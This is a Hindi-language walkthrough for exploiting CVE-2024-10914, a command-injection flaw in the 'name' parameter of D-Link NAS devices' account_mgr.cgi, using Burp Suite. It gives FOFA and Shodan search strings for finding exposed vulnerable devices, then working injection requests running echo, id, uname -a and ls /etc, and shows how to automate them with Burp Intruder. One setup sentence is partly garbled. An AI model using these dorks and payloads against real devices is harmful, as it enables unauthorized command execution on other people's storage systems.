
CVE-2024-10914_burpsuite के साथ मैन्युअल परीक्षण
संभावित रूप से कमजोर D-Link NAS डिवाइस खोजने के लिए निम्नलिखित सर्च dork का उपयोग करें:
FOFA:
app="D_Link-DNS-ShareCenter" && server=="lighttpd/1.4.25-devel-fb150ff"
SHODAN:
"http.title:D-Link" product:"lighttpd"
यह सर्च स्ट्रिंग उन डिवाइसों की पहचान करने में मदद करती है जो कमजोर D-Link DNS ShareCenter ऐप को Lighttpd सर्वर के उस विशेष संस्करण के साथ चला रहे हैं जो इस भेद्यता से प्रभावित है।
यह मार्गदर्शिका Burp Suite का उपयोग करके D-Link NAS के name पैरामीटर में कमांड इंजेक्शन भेद्यता (CVE-2024-10914) का मैन्युअल रूप से परीक्षण करने के लिए चरण-दर-चरण निर्देश प्रदान करती है। लक्ष्य URL: http://Target।
127.0.0.1:8080 पर सेट)8080 पर 127.0.0.1 पर सेट करके सुनिश्चित करें कि आपका ब्राउज़र Burp Suite को अपने प्रॉक्सी के रूप में उपयोग करने के लिए कॉन्फ़िगर किया गया है।http://Target पर जाएँ।कमजोर पैरामीटर का पता लगाएं: इंटरसेप्ट किए गए अनुरोध में, URL में name पैरामीटर खोजें। यह इस प्रकार दिखना चाहिए:
/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;...;%27
एक टेस्ट कमांड इंजेक्ट करें: name पैरामीटर को संशोधित करके उसमें echo "test" जैसा टेस्ट कमांड शामिल करें:
/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;echo%20%22test%22;%27
संशोधित अनुरोध भेजें: संशोधित अनुरोध को सर्वर पर अग्रेषित करें।
प्रतिक्रिया जांचें: प्रतिक्रिया में इंजेक्ट किए गए कमांड का आउटपुट देखें। उदाहरण के लिए, यदि सर्वर ने echo "test" निष्पादित किया है, तो आपको यह देखना चाहिए:
test
एक दुर्भावनापूर्ण कमांड इंजेक्ट करें: यदि परीक्षण सफल होता है, तो अधिक परिष्कृत कमांड आज़माएं, जैसे:
/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;id;%27
शोषण अनुरोध भेजें: इस अनुरोध को सर्वर पर अग्रेषित करें।
प्रतिक्रिया का विश्लेषण करें: जांचें कि क्या कमांड का आउटपुट (जैसे, उपयोगकर्ता ID जानकारी) प्रतिक्रिया में मौजूद है।
Intruder का उपयोग करें: Burp Suite के Intruder टूल के साथ परीक्षण को स्वचालित करें।
name पैरामीटर को पेलोड स्थिति के रूप में सेट करें।उदाहरण पेलोड:
echo "test"
id
uname -a
ls /etc
Intruder प्रारंभ करें: एकाधिक पेलोड का स्वचालित रूप से परीक्षण करने के लिए Intruder अटैक चलाएं।